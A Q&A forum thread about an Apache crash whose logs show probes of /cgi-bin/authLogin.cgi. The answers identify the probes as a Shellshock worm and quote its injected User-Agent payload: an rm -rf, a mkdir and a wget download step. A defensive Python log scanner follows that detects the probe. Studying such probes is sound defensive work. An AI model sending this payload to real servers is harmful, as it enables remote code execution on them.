Apache http server has stopped working


Hi Friends,

I am using AMPPS server with PHP 5.3.29 on Windows Server Datacenter.

Unfortunately I am getting the following prompt in Windows Server and my site is down.

Prompt title: Microsoft Windows

Prompt Message: Apache http server has stopped working.

A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.

Trace:

When I traced the error and access logs, I found the following entries as the cause.

In Apache access log:

202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335

In Apache error log:

[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

Please help me.

4

There are 4 answers

0
karuppub On

Finally I denied those clients access to the cgi-bin directory.

In the cgi-bin directory I created a .htaccess file.

I added the following line in .htaccess:

Deny from all

1
NicholasDTC On

If you try to open this file, what happens?

D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".

0
Mutified On

There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm, so the download server is compromised. I'd like a copy of S0.sh; if you happen to get one, give it to exploit-db or something like it. The clever command is: Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

The file is executed following download. I suppose there's something about HDB_DATA, which I don't even have. "Information is Paramount!"

1
mutified On

I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to or successfully removes /tmp/S0.sh, makes a directory php in the share folder and then executes wget.

/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

Here is what came up after all that time of wondering: http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."

So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.

From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.
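The answers above describe the probe as a Shellshock payload carried in the User-Agent header of requests to /cgi-bin/authLogin.cgi. The following is an added example (not code from the question or any answer) that scans Apache log lines for both signs: hits on that CGI path and the Bash function-definition marker `() {` in the User-Agent or Referer field. It assumes the server writes the "combined" log format, which includes User-Agent; the question's own access log is in the plainer common format, which would not show the header contents. The sample lines are constructed, and the payload remainder is a harmless `/bin/echo`.

```python
import re
from collections import Counter

# Apache "combined" log format (assumed; the question's log lacks the User-Agent field).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# Shellshock trigger: a Bash function definition smuggled into an HTTP header value.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')
# CGI path probed in the question's logs.
PROBE_PATH = '/cgi-bin/authLogin.cgi'

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Return the list of findings for one parsed entry (empty list if benign)."""
    findings = []
    parts = entry['req'].split(' ')
    path = parts[1] if len(parts) > 1 else ''
    if path == PROBE_PATH:
        findings.append('cgi-probe')
    for field in ('ua', 'referer'):
        if SHELLSHOCK_RE.search(entry[field]):
            findings.append('shellshock-' + field)
    return findings

def scan(lines):
    """Return {client_ip: Counter(finding -> count)}; IPs with no findings are omitted."""
    report = {}
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue  # skip malformed or non-combined lines
        for finding in classify(entry):
            report.setdefault(entry['ip'], Counter())[finding] += 1
    return report

# Constructed sample lines (not from the page): a benign request, a plain probe of the
# CGI path, the same path with the Shellshock marker in User-Agent, and a junk line.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2014:05:00:00 -0500] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 "-" "() { :; }; /bin/echo probe"',
    'not a log line',
]

if __name__ == '__main__':
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

A 404 on the CGI path, as in the question, means the script was never executed; the marker in the header is what tells you the request was a Shellshock attempt rather than an ordinary scan for the file.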